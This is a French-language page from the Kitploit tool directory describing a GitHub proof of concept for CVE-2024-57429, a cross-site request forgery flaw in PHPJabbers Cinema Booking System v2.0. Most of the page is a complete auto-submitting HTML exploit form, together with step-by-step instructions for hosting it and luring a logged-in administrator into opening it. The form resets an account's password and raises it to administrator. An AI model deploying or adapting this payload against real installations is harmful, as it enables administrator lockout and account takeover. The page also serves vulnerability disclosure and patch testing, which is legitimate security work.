Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-57429 — CVE-2024-57429 : PHPJabbers Cinema Booking System v2.0 est vulnérable aux CSRF, permettant aux attaquants d'élever les privilèges en falsifiant des requêtes au nom d'un administrateur. | Kitploit
Outils/GitHubGitHub/ahrixia/cve-2024-57429
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubahrixia/cve-2024-57429

CVE-2024-57429

CVE-2024-57429 : PHPJabbers Cinema Booking System v2.0 est vulnérable aux CSRF, permettant aux attaquants d'élever les privilèges en falsifiant des requêtes au nom d'un administrateur.

Voir le dépôt
35il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-57429

Une vulnérabilité de falsification de requête intersite (CSRF) dans la fonction pjActionUpdate de PHPJabbers Cinema Booking System v2.0 permet à des attaquants distants d'élever leurs privilèges en amenant un administrateur authentifié à soumettre une requête non autorisée.

Impact :

L'exploitation de cette vulnérabilité CSRF peut entraîner des actions non autorisées, notamment :

  • Modifier le mot de passe de l'administrateur, l'enfermant ainsi dehors.
  • Élever les privilèges de l'attaquant à celui d'administrateur en mettant à jour son rôle d'utilisateur.

Exploit - Preuve de concept (POC)

Falsification de requête intersite (CSRF)

poc.html

root@kitploit:~
<html>
 <!-- CSRF PoC - Update Admin User -->
 <body>
   <form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
     <input type="hidden" name="user_update" value="1" />
     <input type="hidden" name="id" value="3" />
     <input type="hidden" name="role_id" value="1" />
     <input type="hidden" name="email" value="[email protected]" />
     <input type="hidden" name="password" value="newpassword123" />
     <input type="hidden" name="name" value="Attacker" />
     <input type="hidden" name="phone" value="1234567890" />
     <input type="hidden" name="status" value="T" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     history.pushState('', '', '/');
     document.forms[0].submit();
   </script>
 </body>
</html>
  1. Enregistrez le code ci-dessus sous le nom poc.html
  2. Hébergez le fichier sur un serveur et incitez l'administrateur à y accéder alors qu'il est connecté à l'application.
  3. Le compte de l'administrateur sera mis à jour avec les détails de l'attaquant et un nouveau mot de passe.
Télécharger l’outil